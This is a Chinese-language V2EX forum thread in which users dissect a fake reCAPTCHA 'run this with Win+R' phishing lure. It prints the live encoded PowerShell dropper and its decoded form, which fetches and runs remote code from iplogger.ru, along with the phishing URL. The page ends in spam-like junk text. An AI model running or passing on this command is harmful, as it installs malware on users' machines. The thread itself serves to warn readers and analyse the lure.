我也遇到了,让你执行 win+R 的钓鱼网站 - V2EX
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
20160409
V2EX    信息安全

我也遇到了,让你执行 win+R 的钓鱼网站

  •  
  •   20160409 361 天前 3436 次点击
    这是一个创建于 361 天前的主题,其中的信息可能已经有所发展或是发生改变。

    弹窗广告,弹出了伪装 Google recaptcha 的验证界面,点击验证后变成图中这个、并把以下命令自动拷贝到了剪切板,让你执行。

    供各位把玩。

    除非你知道自己在干嘛,否则不要执行这个 powershell 命令。

    https://pub-9c4ec7f3f95c448b85e464d2b533aac1.r2.dev/CAptcha-verify-Approvals-system.html

    powershell -W Hidden -eC aQBlAHgAIAAoAGkAdwByACAAaAB0AHQAcABzADoALwAvAGkAcABsAG8AZwBnAGUAcgAuAHIAdQAvADIANQAwADkAMgA1ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAC4AQwBvAG4AdABlAG4AdAA=

    5202517f5bb3c7124748d8d.png

    8 条回复    2024-10-16 16:38:26 +08:00
    colinlikepotatos
        1
    colinlikepotatos  
       361 天前
    笑死,我 mac 打开的 都没识别一下
    iorilu
        2
    iorilu  
       361 天前
    拿这行命令什么意思呢, pwsh 可以用 base64 编码得命令?
    CCddf
        3
    CCddf  
       361 天前
    @iorilu iex (iwr https://iplogger.ru/250925 -UseBasicParsing).Content

    iex Invoke-Expression Runs commands or expressions on the local computer.
    iwr Invoke-WebRequest Gets content from a web page on the internet.
    -UseBasicParsing This parameter has been deprecated. Beginning with PowerShell 6.0.0, all Web requests use basic parsing only. This parameter is included for backwards compatibility only and any use of it has no effect on the operation of the cmdlet.
    iqoo
        4
    iqoo  
       361 天前
    收到过好几次,自称 github issue 回复的。连系统都不判断下,mac 系统发一个 exe 链接 给他压力测试了
    PrinceofInj
        5
    PrinceofInj  
       361 天前
    解码了一下,实际是是下载 https://eu2.contabostorage.com/97c9beb737884d93a1899766d9f4e34c:gostired/leo15.zip 这个文件解压后执行,压缩包是啥就不知道了。不敢下载,怕被 IT 抓
    NothingExist
        6
    NothingExist  
       360 天前
    iex (iwr https://iplogger.ru/250925 -UseBasicParsing).Content

    这行命令会向一个 iplogger.ru 网站发送请求,并运行返回的内容。通常情况下,这类操作用于收集用户的 IP 地址或进行其他恶意活动,建议小心运行这种脚本,尤其是在不了解其来源的情况下。
    20160409
        7
    20160409  
    OP
       360 天前
    @PrinceofInj #5 草草的在线扫一下,有人已经扫过了

    https://www.virustotal.com/gui/url/c50ae17824c6843108f64fb68f4da5334deb2c7347b7072d784c320fa3d27341

    Last Analysis Date
    15 hours ago
    xiaocczhi
        8
    xiaocczhi  
       360 天前
    机箱冒烟了
    关于     帮助文档     自助推广系统     博客     API     FAQ     Solana     1205 人在线   最高记录 6679       Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 24ms UTC 17:30 PVG 01:30 LAX 10:30 JFK 13:30
    Do have faith in what you're doing.
    ubao snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86